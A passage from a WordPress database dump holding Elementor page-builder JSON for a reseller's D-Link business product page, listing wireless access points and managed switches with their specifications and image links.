expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"69\",\"right\":\"69\",\"bottom\":\"69\",\"left\":\"69\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"medium\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"802.11ac Wave 2 wireless, up to 1.75 Gbps\\n\\nMU-MIMO with beamforming\\n\\nBand steering\\n\\nGigabit PoE-capable LAN port\\n\\nAP Array utility support\\n\\nFree D-Link Central WiFiManager\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6ad865a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"254\",\"right\":\"254\",\"bottom\":\"254\",\"left\":\"254\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a79c898\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">Enjoy High-performance Wireless Connectivity<\\/h4><p style=\\\"text-align: left;\\\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><h4 style=\\\"text-align: center;\\\">MU-MIMO with Beamforming<\\/h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><h4 style=\\\"text-align: center;\\\">Multiple Operational Modes<\\/h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"704cbac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"7\",\"right\":\"7\",\"bottom\":\"7\",\"left\":\"7\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>Support Central WiFi Manager to configure and manage multiple AP<\\/p><center>[maxbutton id=\\\"6\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0912f1d\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"50\",\"bottom\":\"50\",\"left\":\"50\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"394708f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<br \\/>\\u2022 Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7593,3413,'_elementor_version','2.5.14'),(7594,3413,'_elementor_edit_mode','builder'),(7599,3414,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"284\",\"right\":\"284\",\"bottom\":\"284\",\"left\":\"284\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"69\",\"right\":\"69\",\"bottom\":\"69\",\"left\":\"69\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access 